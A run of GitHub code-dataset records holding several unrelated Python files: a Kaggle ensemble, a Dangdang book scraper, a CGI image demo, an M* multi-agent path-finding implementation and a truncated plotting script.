verbose_eval=500)\n\n\nprint('[{}] Finished training model...'.format(time.time() - start_time))\n\npreds1 = model.predict(X_test)\n\nprint('[{}] Predict LGB completed.'.format(time.time() - start_time))\n\nmodel3 = FM_FTRL(alpha=0.01, beta=0.01, L1=0.00001, L2=0.1, D=sparse_merge.shape[1], alpha_fm=0.01, L2_fm=0.0,\n                 init_fm=0.01,\n                 D_fm=200, e_noise=0.0001, iters=17, inv_link=\"identity\", threads=4)\n\nmodel3.fit(X, y)\nprint('[{}] Train FM_FTRL completed'.format(time.time() - start_time))\n\npreds3 = model3.predict(X_test)\n\nfinal_pred = 0.39479745 * preds1 + 0.60691396 * preds3\n\nsubmission['price'] = np.expm1(final_pred)\nsubmission.to_csv(\"submission_2.csv\", index=False)\n\nprint('[{}] Finished training models...'.format(time.time() - start_time))\n","repo_name":"hiflyin/Kaggle-Solutions_in_top_10pc","sub_path":"mercari_top_8pc/MM55.py","file_name":"MM55.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"41712507829","text":"import requests\nfrom lxml import etree\nfrom fake_useragent import UserAgent\nimport re\nimport csv\nimport urllib\nimport urllib.request\nimport os\n\nTYPE = '医学'\nKEY_VALUE = '医学'\nCSV_PATH = TYPE +'.csv'\nIMG_PATH = 
'C:\\\\Users\\\\Administrator\\\\Desktop\\\\图书信息\\\\'+TYPE+'\\\\原图'\nx = 1\ndef get_page(key):\n    for page in range(1,20):\n        url = 'http://search.dangdang.com/?key=%s&act=input&page_index=%s' % (key,page)\n        headers = {\n            'User-Agent':UserAgent().random\n        }\n        response = requests.get(url = url,headers = headers)\n        parse_page(response)\n        print('page %s over!!!' % page)\n\ndef parse_page(response):\n    tree = etree.HTML(response.text)\n    li_list = tree.xpath('//ul[@class=\"bigimg\"]/li')\n    # print(len(li_list)) # debug\n    path = IMG_PATH\n    if not os.path.isdir(path):\n        os.makedirs(path) # create the directory if it does not exist\n    paths = path + '\\\\' # trailing backslash so files are saved inside this directory\n    global x\n    flag = 0\n    for li in li_list:\n        data = []\n        try:\n            # get the book title and append it to the list\n            title = li.xpath('./p[@class=\"name\"]/a/@title')[0].strip()\n            data.append(title)\n            # get the price and append it to the list\n            price = li.xpath('./p[@class=\"price\"]/span[1]/text()')[0]\n            pub_price = re.sub('¥','',price).strip()\n            data.append(pub_price)\n            # get the author and append it to the list\n            author = ''.join(li.xpath('./p[@class=\"search_book_author\"]/span[1]//text()')).strip()\n            data.append(author)\n            # get the publisher and append it to the list\n            press = ''.join(li.xpath('./p[@class=\"search_book_author\"]/span[3]//text()')).strip()\n            pub_press = re.sub('/','',press).strip()\n            data.append(pub_press)\n            # get the publication date and append it to the list\n            time = li.xpath('./p[@class=\"search_book_author\"]/span[2]/text()')[0]\n            pub_time = re.sub('/','',time).strip()\n            data.append(pub_time)\n            # get the book description and append it to the list; some books have none, hence the try\n            commodity_detail = ''\n            commodity_detail = li.xpath('./p[@class=\"detail\"]/text()')[0]\n            data.append(commodity_detail)\n            # get the cover image URL (the first item exposes @src, later ones @data-original)\n            if(flag != 0):\n                imgurl =''.join(li.xpath('./a/img/@data-original'))\n            else:\n                imgurl =''.join(li.xpath('./a/img/@src'))\n                flag = flag + 1\n            urllib.request.urlretrieve(imgurl, '{0}{1}.jpg'.format(paths, x)) # download the image to disk\n            img_path = '' + str(x) + \".jpg\"\n            data.append(img_path)\n            x = x + 1\n        except Exception as e:\n            pass\n        save_data(data)\n\ndef save_data(data):\n    writer.writerow(data)\n\ndef main():\n    key = KEY_VALUE # input('Please input key:')\n    get_page(key) \nfp = open(CSV_PATH,'w+',encoding = 'utf-8-sig',newline = '')\nwriter = csv.writer(fp)\nheader = ['书名','价格','作者','出版社','出版时间','简介','图片名']\nwriter.writerow(header)\nmain()\nfp.close()","repo_name":"qxpineapple/CrawlerInAndResultHandle","sub_path":"Python/getDoubanBook.py","file_name":"getDoubanBook.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"70219551839","text":"import os\nfrom io import BytesIO\nfrom PIL import Image, ImageDraw\nfrom sys import stdin, stdout\n\nif __name__ == '__main__':\n    image_data = stdin.buffer.read(int(os.environ['CONTENT_LENGTH']))\n    cgi_headers = [\n        \"SERVER_SOFTWARE\", \"SERVER_NAME\", \"GATEWAY_INTERFACE\",\n        \"SERVER_PROTOCOL\", \"SERVER_PORT\", \"REQUEST_METHOD\",\n        \"QUERY_STRING\", \"SCRIPT_NAME\", \"REMOTE_HOST\",\n        \"CONTENT_TYPE\", \"CONTENT_LENGTH\"]\n    header_output = '\\n'.join([ os.environ[x] for x in cgi_headers ])\n    with Image.open(BytesIO(image_data)) as im:\n        resized_image = im.resize((800,800))\n        draw = ImageDraw.Draw(resized_image)\n        draw.multiline_text((10,10), header_output, fill=\"black\")\n        resized_image.save(stdout.buffer, 'png')","repo_name":"cwgem/python-deployment-protocols","sub_path":"cgi/cgi_application.py","file_name":"cgi_application.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"1619203656","text":"from queue import PriorityQueue\nfrom sklearn.model_selection import ParameterGrid\nimport copy\nimport heapq\nimport time\n\nclass Vertex():\n def __init__(self, v_id):\n assert type(v_id) == tuple\n assert len(v_id) == 2\n\n self.v_id = v_id\n self.collision_set = frozenset()\n self.g = 1e6\n self.f = None\n self.back_set = dict()\n self.back_ptr = None\n self.forward_pointer = None\n \n @property\n def is_standard(self):\n return self.v_id[0] == self.v_id[1]\n \n def add_collision(self, other_collision_set):\n # print(\"other col set: {}\".format(other_collision_set))\n other_col_set2 = []\n # make work with single set or sets of sets:\n for temp in other_collision_set:\n if type(temp) == frozenset:\n other_col_set2.append(temp)\n else:\n other_col_set2.append(other_collision_set)\n break\n #assert len(other_collision_set) > 1\n assert self._check_valid_collision_set() == True\n for other_collision_set in other_col_set2:\n to_merge = []\n keep_same = []\n for i in other_collision_set:\n for existing_set in self.collision_set:\n if i in existing_set:\n if not existing_set in to_merge:\n to_merge.append(existing_set)\n else:\n keep_same.append(existing_set)\n to_merge.append(other_collision_set)\n #remove sets in keep_same which is also in to_marge\n keep_same = [k for k in keep_same if not k in to_merge]\n if len(to_merge) == 0:\n keep_same.append(other_collision_set)\n else:\n big_set = []\n for item in to_merge:\n for i2 in item:\n big_set.append(i2)\n big_set = frozenset(big_set)\n new_col_set = []\n new_col_set.append(big_set)\n for k in keep_same:\n new_col_set.append(k)\n new_col_set = frozenset(new_col_set)\n self.collision_set = new_col_set\n # print(\"Added col set {}\".format(self.collision_set))\n # if len(other_collision_set) == 0:\n # return\n # #assert len(other_collision_set) > 1\n # assert self._check_valid_collision_set() == True\n # to_merge = []\n # keep_same = []\n # for i in other_collision_set:\n # for existing_set in self.collision_set:\n # if i in existing_set:\n # if not existing_set in to_merge:\n # to_merge.append(existing_set)\n # else:\n # keep_same.append(existing_set)\n # to_merge.append(other_collision_set)\n # #remove sets in keep_same which is also in to_marge\n # keep_same = [k for k in keep_same if not k in to_merge]\n # if len(to_merge) == 0:\n # keep_same.append(other_collision_set)\n # else:\n # big_set = []\n # for item in to_merge:\n # for i2 in item:\n # big_set.append(i2)\n # big_set = frozenset(big_set)\n # new_col_set = []\n # new_col_set.append(big_set)\n # for k in keep_same:\n # new_col_set.append(k)\n # new_col_set = frozenset(new_col_set)\n # self.collision_set = new_col_set\n # print(\"new col set: {}\".format(new_col_set))\n\n def _check_valid_collision_set(self):\n temp = dict()\n flag = True\n for item in self.collision_set:\n if type(item) == frozenset:\n for it in item:\n if not it in temp:\n temp[it] = it\n else:\n flag = False\n else:\n raise Exception(\"invalid object type in collision set\")\n return flag\n\n # def is_col_subset(self, other_set):\n # flag = False\n # for sub in self.collision_set:\n # if other_set.issubset(sub):\n # flag = True\n # if len(other_set) == 0:\n # flag = True\n # return flag\n def is_col_subset(self, other_set):\n #make work with set of sets and single set:\n other_set2 = []\n is_sets_of_sets = [True if type(i) == frozenset else False for i in other_set]\n if True in is_sets_of_sets:\n assert all(is_sets_of_sets)\n if False in is_sets_of_sets:\n is_sets_of_sets_cpy = 
[not i for i in is_sets_of_sets]\n            assert all(is_sets_of_sets_cpy)\n        \n        if all(is_sets_of_sets) and len(is_sets_of_sets)!=0:\n            for s in other_set:\n                other_set2.append(s)\n        else:\n            other_set2.append(other_set)\n\n        col_set_flat = []\n        is_sets_of_sets = [True if type(i) == frozenset else False for i in self.collision_set]\n        if True in is_sets_of_sets:\n            assert all(is_sets_of_sets)\n        if False in is_sets_of_sets:\n            is_sets_of_sets_cpy = [not i for i in is_sets_of_sets]\n            assert all(is_sets_of_sets_cpy)\n\n        if all(is_sets_of_sets) and len(is_sets_of_sets)!=0:\n            for s in self.collision_set:\n                col_set_flat.append(s)\n        else:\n            col_set_flat.append(self.collision_set)\n\n        #Check if otherset is subset of collision set\n        other_set_dict = {other: False for other in other_set2}\n        for k in other_set_dict.keys():\n            for sub in col_set_flat:\n                if k.issubset(sub):\n                    other_set_dict[k] = True\n        flag = all(list(other_set_dict.values()))\n        return flag\n\n\n    def add_back_set(self, new_v):\n        assert isinstance(new_v, type(self)), \"Input is not a Vertex class\"\n        self.back_set[new_v.v_id] = new_v\n    \n    def get_back_set(self):\n        return self.back_set.values()\n    \n    #For priority queue:\n    def __eq__(self, other_v):\n        return self.g == other_v.g\n    def __gt__(self, other_v):\n        return self.g > other_v.g\n    def __ge__(self, other_v):\n        return self.g >= other_v.g\n    def __lt__(self, other_v):\n        return self.g < other_v.g\n    def __le__(self, other_v):\n        return self.g <= other_v.g\n\n\nclass SimplePriorityQ():\n    def __init__(self):\n        self.q = []\n    def push(self, item):\n        heapq.heappush(self.q, item)\n    def pop(self):\n        (_, n) = heapq.heappop(self.q)\n        return n\n    def empty(self):\n        if len(self.q) == 0:\n            return True\n        else:\n            return False\n\nclass PriorityQueue2(SimplePriorityQ):\n    '''PQ which implements __contains__ member'''\n    def __init__(self):\n        super().__init__()\n        self.lookup_table = {}\n    def add_lookup(self, item):\n        if item[-1].v_id in self.lookup_table:\n            self.lookup_table[item[-1].v_id] += 1\n        else:\n            self.lookup_table[item[-1].v_id] = 1\n    def remove_lookup(self, v):\n        if v.v_id in self.lookup_table:\n            if self.lookup_table[v.v_id] < 2:\n                del self.lookup_table[v.v_id]\n            else:\n                self.lookup_table[v.v_id] -= 1\n    def push(self, item):\n        super().push(item)\n        self.add_lookup(item)\n    def pop(self):\n        result = super().pop()\n        self.remove_lookup(result)\n        return result\n    # def get(self):\n    #     result = super().pop()\n    #     self.remove_lookup(result)\n    #     return result\n    def __contains__(self, key):\n        return key.v_id in self.lookup_table\n\nclass AllVertex():\n    '''Keeps track of all nodes created\n    such that nodes are created only once '''\n    def __init__(self):\n        self.all_v = dict()\n        #self.intermediate = use_intermediate_nodes\n    def get(self, v_id):\n        if v_id in self.all_v:\n            return self.all_v[v_id]\n        else:\n            self.all_v[v_id] = Vertex(v_id)\n            return self.all_v[v_id]\n    \nclass Mstar_ODr():\n    def __init__(self, end, expand_position, get_next_joint_policy_position, get_shortest_path_cost, sub_graphs = None, inflation = None):\n        '''\n        This class implements subdimensional expansion with A* as the search algorithm.\n        It assumes the following functions which are external to the class:\n        -- expand_position: returns the neighbouring vertices of a single position\n        -- get_next_joint_policy_position: Returns the next vertex of a particular agent's \n            joint policy action\n            where the joint policy is the shortest path action\n            where there are no other agents.\n        -- get_shortest_path_cost = the shortest path cost 
of single agent.\n -- get_SIC: returns the sum of individual cost (individual \n optimal path cost from vertex vk to vf)\n '''\n if type(end) == list:\n end = tuple(end)\n \n if type(end) == tuple:\n end = {i:v for i,v in enumerate(end)}\n\n assert type(end) == dict\n self.v_len = len(end)\n self.end_dict = end\n self.agent_ids = frozenset(end.keys())\n self.expand_position = expand_position\n self.get_next_joint_policy_position = get_next_joint_policy_position\n self.heuristic_shortest_path_cost = get_shortest_path_cost\n self.all_v = AllVertex()\n\n if inflation is None:\n self.inflation = 1.0\n else:\n self.inflation = inflation\n\n\n if sub_graphs is None:\n self.sub_graphs = dict()\n else:\n self.sub_graphs = sub_graphs\n \n self._init_own_sub_graph()\n\n \n def _init_own_sub_graph(self):\n hldr = list(self.end_dict.keys())\n hldr.sort()\n own_id = tuple(hldr)\n if not own_id in self.sub_graphs:\n self.sub_graphs[own_id] = self.retrieve_next_optimal_pos\n print(\"Creating sub graph: {}\".format(own_id))\n else:\n print(\"_init_own_sub_graph called but id already in sub_graph\")\n\n\n def query_sub_graph_optimal_policy(self, this_graph_sub_id, sub_start_v):\n '''this_graph_sub_id the collision set in this instance of rM*. \n sub_start_v the full position tuple of the vertex which has the collision '''\n #map this_graph_sub_id to global ids\n # create sub_start_dic and sub_end_dict\n # get next sub_graph position\n # map next_sub_graph position back to dict with keys of this_sub_graph_id\n if type(this_graph_sub_id) == int:\n this_graph_sub_id = frozenset([this_graph_sub_id])\n assert type(this_graph_sub_id) == frozenset\n def sort_iterable(variable):\n a = list(variable)\n a.sort()\n return a\n this_graph_sub_id = frozenset(sort_iterable(this_graph_sub_id))\n #assume v positions always arranged in ascending order of global id keys\n true_ids = sort_iterable(self.end_dict.keys())\n sub_start_dict = dict()\n for id in this_graph_sub_id:\n sub_start_dict[true_ids[id]] = sub_start_v[id]\n \n sub_end_dict = dict()\n for id in this_graph_sub_id:\n sub_end_dict[true_ids[id]] = self.end_dict[true_ids[id]]\n\n graph_id = tuple(sort_iterable(sub_start_dict.keys()))\n assert graph_id == tuple(sort_iterable(sub_end_dict.keys()))\n\n if not graph_id in self.sub_graphs:\n if len(graph_id) > 1:\n print(\"End dict is {}\".format(sub_end_dict))\n temp = type(self)(sub_end_dict, self.expand_position, \\\n self.get_next_joint_policy_position, self.heuristic_shortest_path_cost, self.sub_graphs, inflation=self.inflation)\n if not graph_id in self.sub_graphs:\n print(\"Id is: {} Sub end dict is: {}\".format(graph_id, sub_end_dict))\n next_sub_v = self.sub_graphs[graph_id](sub_start_dict, sub_end_dict)\n elif len(graph_id) == 1:\n agent_id = graph_id[0]\n pos = sub_start_dict[agent_id]\n next_sub_v = {agent_id: self.get_next_joint_policy_position(agent_id, pos)[-1]}\n else:\n raise Exception(\"Graph id has to be len >= 1\")\n else:\n assert len(graph_id) > 1\n next_sub_v = self.sub_graphs[graph_id](sub_start_dict, sub_end_dict)\n \n #map glabal keys back to relative keys:\n next_sub_v_relative_id = {}\n this_graph_sub_id_keys =[k for k in this_graph_sub_id]\n this_graph_sub_id_keys.sort()\n for i,val in enumerate(next_sub_v.values()):\n next_sub_v_relative_id[this_graph_sub_id_keys[i]] = val\n return next_sub_v_relative_id\n\n def retrieve_next_optimal_pos(self, start_dict, end_dict):\n def sort_iterable(variable):\n a = list(variable)\n a.sort()\n return a\n \n assert self.end_dict == end_dict\n assert 
type(start_dict) == dict\n        assert set(start_dict.keys()) == set(end_dict.keys())\n        start_tup = []\n        for k in sort_iterable(start_dict.keys()):\n            start_tup.append(start_dict[k])\n        start_tup = tuple(start_tup)\n        end_tup = []\n        for k in sort_iterable(end_dict.keys()):\n            end_tup.append(end_dict[k])\n        end_tup = tuple(end_tup)\n        \n        start_v = (start_tup, start_tup)\n        end_v = (end_tup, end_tup)\n        actions = self.search(start_tup, end_tup)\n        v = self.all_v.all_v[start_v]\n        next_v_tup = None\n        if v.v_id == end_v:\n            next_v_tup = start_v\n        elif v.forward_pointer is None:\n            assert actions is None\n            next_v_tup = None\n        else:\n            next_v = v.forward_pointer\n            cntr = 0\n            while (not next_v is None) and next_v.is_standard == False:\n                next_v = next_v.forward_pointer\n                cntr += 1\n                if cntr > 50000:\n                    raise Exception(\"Infinite while loop\")\n            if next_v is None:\n                next_v_tup = None\n            else:\n                next_v_tup = next_v.v_id\n        if not next_v_tup is None:\n            assert next_v_tup[0] == next_v_tup[1]\n            next_v_dict = {}\n            inter_v, root_v = next_v_tup\n            for k, inter_pos, root_pos in zip(sort_iterable(end_dict.keys()), inter_v, root_v):\n                next_v_dict[k] = inter_pos #(inter_pos, root_pos)\n        else:\n            next_v_dict = None\n        return next_v_dict\n\n    \n    def search(self,start_pos, end_pos, OD = True):\n        open = PriorityQueue2()\n        start_v = (start_pos, start_pos)\n        end_v = (end_pos, end_pos)\n        if len(self.all_v.all_v) > 1:\n            for k,v in self.all_v.all_v.items():\n                v.collision_set = frozenset()\n                v.g = 1e6\n                v.f = None\n                v.back_set = dict()\n                v.back_ptr = None\n        \n        vs = self.all_v.get(start_v)\n        vs.g = 0\n        vs.f = vs.g + self.heuristic_SIC(vs.v_id)\n        open.push((vs.f, vs))\n        if OD:\n            expand_function = self.expand_rOD\n        else:\n            print(\"Not implemented\")\n\n        while not open.empty():\n            vk = open.pop()\n            test = vk.v_id\n            if vk.v_id == end_v or vk.forward_pointer is not None:\n                if vk.v_id == end_v:\n                    self._set_forward_pointers(vk)\n                    return self._back_track(vk)\n                else:\n                    self._set_forward_pointers(vk)\n                    cntr1 = 0\n                    while vk.forward_pointer is not None:\n                        vk = vk.forward_pointer\n                        cntr1 +=1\n                        assert cntr1 < 50000\n                    assert vk.v_id == end_v\n                    return self._back_track(vk)\n            \n            for vl_id in expand_function(vk, self.end_dict):\n                # Intermediate nodes not part of backprop\n                #For standard v only\n                vl = self.all_v.get(vl_id)\n                v_pos = vl.v_id[-1]\n                col = self._is_pos_colliding(v_pos)\n                if vl.is_standard:\n                    vl.add_back_set(vk)\n                    vl.add_collision(col)\n                    self._backprop(vk, vl.collision_set, open)\n                if (len(col) == 0 or vl.is_standard==False) and vk.g + self.get_move_cost(vk,vl, end_pos) < vl.g:\n                    vl.g = vk.g + self.get_move_cost(vk,vl, end_pos)\n                    vl.f = vl.g + self.heuristic_SIC(vl.v_id)\n                    vl.back_ptr = vk\n                    open.push((vl.f, vl))\n        print(\"returning no solution\")\n        print(\"This graph is {}\".format(tuple(list(self.end_dict.keys()))))\n        for k,v in self.all_v.all_v.items():\n            f_ptr = None\n            if not v.forward_pointer is None:\n                f_ptr = v.forward_pointer.v_id\n            print(\"V: {} Forward_ptr: {} \".format(k, f_ptr))\n        return None\n\n    def _backprop(self, v_k, c_l, open):\n        if v_k.is_standard:\n            if not v_k.is_col_subset(c_l):\n                v_k.add_collision(c_l)\n                if not v_k in open:\n                    priority = v_k.g + self.heuristic_SIC(v_k.v_id)\n                    open.push((priority, v_k))\n                for v_m in v_k.get_back_set():\n                    self._backprop(v_m, v_k.collision_set, open)\n\n    def heuristic_SIC(self, v_id):\n        (inter_tup, vertex_pos_tup) = v_id\n        total_cost = 0\n        true_id = list(self.end_dict.keys())\n        for i, pos in enumerate(inter_tup):\n            i_true = true_id[i]\n            if pos == \"_\":\n                total_cost += 
self.heuristic_shortest_path_cost(i_true, vertex_pos_tup[i])\n            else:\n                total_cost += self.heuristic_shortest_path_cost(i_true, pos)\n        return total_cost * self.inflation\n    \n    def _is_pos_colliding(self, v_pos):\n        '''Returns the set of colliding agents '''\n        hldr = set()\n        for i, vi in enumerate(v_pos):\n            for i2, vi2 in enumerate(v_pos):\n                if i != i2:\n                    if vi == vi2:\n                        hldr.add(i)\n                        hldr.add(i2)\n        hldr = frozenset([i for i in hldr])\n        return hldr \n\n    def get_move_cost(self, vk, vn, end_pos):\n        '''Cost of moving from vertex vk to vn '''\n        #It is possible for vk and vn to both be standard nodes. Need to account for this in cost\n        # Due to subdimensional expansion, expanded node neighbours are not always 1 apart. \n        # eg. expanding a standard node where x agents follow individually optimal policies\n        \n        assert len(end_pos) == self.v_len\n        end = list(end_pos)\n        # Four possible conditions for vk and vn being either standard or intermediate\n        if vk.is_standard:\n            if vn.is_standard:\n                cost = self.v_len\n                #count number of transitions from goal to goal pos\n                num_agents_stay_on_goal = 0\n                for gp, pk,pn in zip(end, vk.v_id[0], vn.v_id[0]):\n                    if pk == gp and pn == gp:\n                        num_agents_stay_on_goal += 1\n                cost -= num_agents_stay_on_goal\n                assert cost >= 0\n            else:\n                #vk should be root node of vn\n                assert vk.v_id[1] == vn.v_id[1]\n                cnt_vn = 0\n                for g, pn,pk in zip(end, vn.v_id[0], vk.v_id[0]):\n                    if not pn == '_':\n                        if pn == g and pk == g: #if agent stayed on goal\n                            cnt_vn += 0\n                        else:\n                            cnt_vn += 1\n                cost = cnt_vn\n        else:\n            if vn.is_standard:\n                num_pos_changed = 0\n                cost = 0\n                for gp, pk, pn, pk_root in zip(end, vk.v_id[0], vn.v_id[0], vk.v_id[1]):\n                    if pk == '_':\n                        assert not pn == \"_\"\n                        num_pos_changed += 1\n                        if pn == gp and pk_root == gp:\n                            cost += 0\n                        else:\n                            cost += 1\n                assert num_pos_changed == 1\n            else:\n                num_pos_changed = 0\n                cost = 0\n                for gp, pk, pn, pk_root in zip(end, vk.v_id[0], vn.v_id[0], vk.v_id[1]):\n                    if pk == '_' and not pn == \"_\":\n                        num_pos_changed += 1\n                        if pn == gp and pk_root == gp:\n                            cost += 0\n                        else:\n                            cost += 1\n                assert num_pos_changed == 1\n        \n        assert cost >= 0 #vn should always be of higher count\n        return cost\n    \n\n    def expand_rOD(self, v, end_dict):\n        assert len(end_dict) == self.v_len\n        (inter_tup, vertex_pos_tup) = v.v_id\n        next_inter_tup = [] #list(inter_tup)\n        # If standard node create next intermediate node base\n        # else convert current inter_tup to list\n        if not \"_\" in inter_tup: #if standard node\n            assert(v.is_standard)\n            collision_set = v.collision_set\n            next_tup = {i:None for i in range(self.v_len)}\n            this_all_ids = frozenset([i for i in range(self.v_len)])\n            for c in collision_set:\n                if len(c) == len(self.agent_ids):\n                    assert len(collision_set) == 1\n                    assert c == this_all_ids\n                    for i in this_all_ids:\n                        next_tup[i] = \"_\"\n                else:\n                    n_p = self.query_sub_graph_optimal_policy(c, v.v_id[0])\n                    hldr = set([i for i in c])\n                    hldr2 = set(n_p.keys())\n                    assert hldr == hldr2\n                    for k,val in n_p.items():\n                        assert next_tup[k] is None\n                        next_tup[k] = val\n            all_col_ids = []\n            for c in collision_set:\n                for c2 in c:\n                    all_col_ids.append(c2)\n            all_col_ids = frozenset(all_col_ids)\n            diff = this_all_ids.difference(all_col_ids)\n\n            #Get next shortest path position for non-colliding agents\n            for d in diff:\n                assert not \"_\" in next_inter_tup\n                n_pos = self.query_sub_graph_optimal_policy(d, v.v_id[0])\n                for k,val in n_pos.items():\n                    assert next_tup[k] is None\n                    next_tup[k] = val\n            next_inter_tup = list(next_tup.values())\n            assert not None in next_inter_tup\n        else:\n            next_inter_tup = list(inter_tup)\n        \n        #Determine 
intermediate node level\n this_inter_level = None\n for i,p in enumerate(next_inter_tup):\n if p == '_':\n this_inter_level = i\n break\n \n all_next_inter_tup = []\n if not this_inter_level is None:\n #if not a standard vertex\n pos = vertex_pos_tup[this_inter_level]\n positions_taken = [p for p in next_inter_tup if p != '_']\n n_pos = self.expand_position(i, pos)\n valid_n_pos = [p for p in n_pos if not p in positions_taken]\n\n if len(valid_n_pos) == 0:\n return []\n for p in valid_n_pos:\n next_inter_tup[this_inter_level] = p \n all_next_inter_tup.append(tuple(next_inter_tup))\n else:\n all_next_inter_tup.append(tuple(next_inter_tup))\n assert not \"_\" in next_inter_tup #should be standard node\n\n #Make v_id's:\n v_ids = []\n for inter_v in all_next_inter_tup:\n if not \"_\" in inter_v:\n v_ids.append((tuple(inter_v), tuple(inter_v)))\n else:\n v_ids.append((tuple(inter_v), vertex_pos_tup))\n return v_ids\n \n\n def expand_joint_actions(self, v):\n raise Exception(\"This function should not be called\")\n (inter_tup, vertex_pos_tup) = v.v_id\n assert inter_tup == vertex_pos_tup\n num_agents = len(vertex_pos_tup)\n all_positions = dict()\n collisions = v.collision_set\n for i,p in enumerate(vertex_pos_tup):\n if i in collisions:\n\n all_positions[i] = self.expand_position(i, p)\n else:\n n_pos = self.get_next_joint_policy_position(i, p)\n all_positions[i] = n_pos \n joint_positions = ParameterGrid(all_positions)\n next_v_id = []\n for j_pos in joint_positions:\n v_id = tuple([j_pos[i] for i in range(num_agents)])\n v_id = (v_id, v_id)\n next_v_id.append(v_id)\n return next_v_id\n \n def _set_forward_pointers(self, goal_v):\n this_v = goal_v\n while not this_v.back_ptr is None:\n back_v = this_v.back_ptr\n back_v.forward_pointer = this_v\n this_v = back_v\n\n def _back_track(self, goal_v):\n '''Returns a dictionary of actions for the optimal path '''\n self.pos_act = {(0,1):2,\n (1,0):3,\n (0,-1):4,\n (-1,0):1,\n (0,0): 0}\n \n #get vertices:\n all_v = []\n all_v.append(goal_v.v_id[-1])\n next_v = goal_v.back_ptr\n while not next_v is None:\n if next_v.is_standard:\n all_v.append(next_v.v_id[-1])\n next_v = next_v.back_ptr\n #Get actions from vertices:\n all_actions = []\n prev_v = all_v[-1]\n for v in reversed(all_v[:-1]):\n actions = {}\n for i, (previous_position, next_postion) in enumerate(zip(prev_v, v)):\n position_diff = self._add_tup(next_postion, self._mult_tup(previous_position, -1))\n actions[i] = self.pos_act[position_diff]\n prev_v = v\n all_actions.append(actions)\n return all_actions\n\n def _add_tup(self, a,b):\n assert len(a) == len(b)\n ans = []\n for ia,ib in zip(a,b):\n ans.append(ia+ib)\n return tuple(ans)\n\n def _mult_tup(self, a, m):\n ans = []\n for ai in a:\n ans.append(ai*m)\n return tuple(ans)\n\n\n\n","repo_name":"Jamesellis51015/Multi-Agent-Path-Finding-with-Reinforcement-Learning","sub_path":"utils/ODrM_star.py","file_name":"ODrM_star.py","file_ext":"py","file_size_in_byte":26862,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"23059665812","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nimport logging\nimport pandas\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nlogger = logging.getLogger(__name__)\n\n\nLOG_FORMAT = \"%(asctime)-15s %(levelname)s %(relativeCreated)dms \" \\\n \"%(filename)s::%(funcName)s():%(lineno)d %(message)s\"\n\n\nclass Formatter(argparse.ArgumentDefaultsHelpFormatter,\n argparse.RawDescriptionHelpFormatter):\n pass\n\n\ndef 
_parse_arguments(desc, args):\n    \"\"\"\n    Parses command line arguments\n    :param desc:\n    :param args:\n    :return:\n    \"\"\"\n    parser = argparse.ArgumentParser(description=desc,\n                                     formatter_class=Formatter)\n    parser.add_argument('csvfile', help='Input CSV file')\n    parser.add_argument('--matplotlibgui', default='Qt4Agg',\n                        help='Library to use for plotting')\n    parser.add_argument('--logconf', default=None,\n                        help='Path to python logging configuration file in '\n                             'this format: https://docs.python.org/3/library/'\n                             'logging.config.html#logging-config-fileformat '\n                             'Setting this overrides -v parameter which uses '\n                             ' default logger. (default None)')\n    parser.add_argument('--verbose', '-v', action='count', default=0,\n                        help='Increases verbosity of logger to standard '\n                             'error for log messages in this module. '\n                             'Messages are '\n                             'output at these python logging levels '\n                             '-v = ERROR, -vv = WARNING, -vvv = INFO, '\n                             '-vvvv = DEBUG, -vvvvv = NOTSET (default no '\n                             'logging)')\n\n    return parser.parse_args(args)\n\n\ndef _setup_logging(args):\n    \"\"\"\n    Sets up logging based on parsed command line arguments.\n    If args.logconf is set use that configuration otherwise look\n    at args.verbose and set logging for this module\n    :param args: parsed command line arguments from argparse\n    :raises AttributeError: If args is None or args.logconf is None\n    :return: None\n    \"\"\"\n\n    if args.logconf is None:\n        level = (50 - (10 * args.verbose))\n        logging.basicConfig(format=LOG_FORMAT,\n                            level=level)\n        logger.setLevel(level)\n        return\n\n    # logconf was set use that file; logging.config must be imported explicitly\n    import logging.config\n    logging.config.fileConfig(args.logconf,\n                              disable_existing_loggers=False)\n\n\ndef run(theargs):\n    \"\"\"\n    Using pandas this function reads in the csvfile input file and\n    generates 2 figures with subplots in each figure. 
The first\n figure contains scatter subplots and the second figure is a\n histogram plot for each column of the data.\n\n NOTE: In this implementation matplotlib will pause after\n creating the figures\n so the caller must close the figures for the program to exit\n\n :param theargs: arguments from ArgParse\n :return: 0 upon success otherwise failure\n \"\"\"\n matplotlib.use(theargs.matplotlibgui)\n df = pandas.read_csv(theargs.csvfile, delimiter=',',\n header=None)\n csvfilename = os.path.basename(theargs.csvfile)\n\n fig, axes = plt.subplots(nrows=2, ncols=3)\n fig.suptitle(csvfilename + ' plots', fontsize=16)\n fig.set_size_inches((18, 11))\n # nodes vs number clusters\n ax = df.plot(ax=axes[1, 0], kind='scatter', x=1, y=6, color='red')\n ax.set_xlabel('# of Nodes')\n ax.set_ylabel('# of clusters')\n axes[1, 0].set_title('# of nodes')\n\n # edges vs number clusters\n ax = df.plot(ax=axes[0, 0], kind='scatter', x=2, y=6, color='green')\n ax.set_xlabel('# of edges')\n ax.set_ylabel('# of clusters')\n axes[0, 0].set_title('# of edges')\n\n # density vs number clusters\n ax = df.plot(ax=axes[1, 1], kind='scatter', x=3, y=6, color='blue')\n ax.set_xlabel('Density')\n ax.set_ylabel('# of clusters')\n axes[1, 1].set_title('Density')\n\n # DegreeMean vs number clusters\n logger.debug(df.head())\n ax = df.plot(ax=axes[1, 2], kind='scatter', x=4, y=6, color='yellow')\n ax.set_xlabel('DegreeMean')\n ax.set_ylabel('# of clusters')\n axes[1, 2].set_title('DegreeMean')\n\n # number nodes vs number edges\n logger.debug(df.head())\n ax = df.plot(ax=axes[0, 2], kind='scatter', x=1, y=2, color='pink')\n ax.set_xlabel('# of nodes')\n ax.set_ylabel('# of edges')\n axes[0, 2].set_title('# nodes vs # edges')\n\n # Degree Stddev vs number clusters\n ax = df.plot(ax=axes[0, 1], kind='scatter', x=5, y=6, color='orange')\n ax.set_xlabel('DegreeStddev')\n ax.set_ylabel('# of clusters')\n axes[0, 